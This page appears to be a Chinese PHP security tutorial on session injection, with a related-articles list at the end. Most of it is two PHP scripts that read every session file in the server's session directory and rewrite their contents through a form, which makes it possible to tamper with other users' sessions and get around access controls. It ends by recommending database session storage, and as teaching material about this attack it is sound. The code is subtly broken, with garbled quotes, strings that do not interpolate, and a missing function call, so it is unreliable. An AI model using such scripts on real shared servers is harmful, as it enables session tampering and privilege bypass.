PHP安全-會(huì)話注入
一個(gè)與會(huì)話暴露類似的問題是會(huì)話注入。此類攻擊是基于你的WEB服務(wù)器除了對(duì)會(huì)話存儲(chǔ)目錄有讀取權(quán)限外,還有寫入權(quán)限。因此,存在著編寫一段允許其他用戶添加,編輯或刪除會(huì)話的腳本的可能。下例顯示了一個(gè)允許用戶方便地編輯已存在的會(huì)話數(shù)據(jù)的HTML表單:
<?php
session_start();
?>
<form action='inject.php' method='POST'>
<?php
$path = ini_get(’session.save_path’);
$handle = dir($path);
while ($filename = $handle->read())
{
if (substr($filename, 0, 5) == ’sess_’)
{
$sess_data = file_get_contents('$path/$filename');
if (!empty($sess_data))
{
session_decode($sess_data);
$sess_data = $_SESSION;
$_SESSION = array();
$sess_name = substr($filename, 5);
$sess_name = htmlentities($sess_name, ENT_QUOTES, ’UTF-8’);
echo '<h1>Session [$sess_name]</h1>';
foreach ($sess_data as $name => $value)
{
$name = htmlentities($name, ENT_QUOTES, ’UTF-8’);
$value = htmlentities($value, ENT_QUOTES, ’UTF-8’);
echo '<p>
$name:
<input type='text'
name='{$sess_name}[{$name}]'
value='$value' />
</p>';
}
echo ’<br />’;
}
}
}
$handle->close();
?>
<input type='submit' />
</form>
腳本inject.php執(zhí)行由表單所指定的修改:
<?php
session_start();
$path = ini_get(’session.save_path’);
foreach ($_POST as $sess_name => $sess_data)
{
$_SESSION = $sess_data;
$sess_data = session_encode;
file_put_contents('$path/$sess_name', $sess_data);
}
$_SESSION = array();
?>
此類攻擊非常危險(xiǎn)。攻擊者不僅可以編輯你的用戶的數(shù)據(jù),還可以編輯他自己的會(huì)話數(shù)據(jù)。它比會(huì)話劫持更為強(qiáng)大,因?yàn)楣粽吣苓x擇所有的會(huì)話數(shù)據(jù)進(jìn)行修改,從而使繞過訪問限制和其他安全手段成為可能。
針對(duì)這個(gè)問題的最好解決方案是將會(huì)話數(shù)據(jù)保存在數(shù)據(jù)庫中。參見前節(jié)所示。
相關(guān)文章:
1. .Net加密神器Eazfuscator.NET?2023.2?最新版使用教程2. jsp文件下載功能實(shí)現(xiàn)代碼3. 如何在jsp界面中插入圖片4. ASP動(dòng)態(tài)網(wǎng)頁制作技術(shù)經(jīng)驗(yàn)分享5. 詳解瀏覽器的緩存機(jī)制6. .Net Core和RabbitMQ限制循環(huán)消費(fèi)的方法7. Xml簡介_動(dòng)力節(jié)點(diǎn)Java學(xué)院整理8. phpstudy apache開啟ssi使用詳解9. jsp實(shí)現(xiàn)登錄驗(yàn)證的過濾器10. JSP之表單提交get和post的區(qū)別詳解及實(shí)例
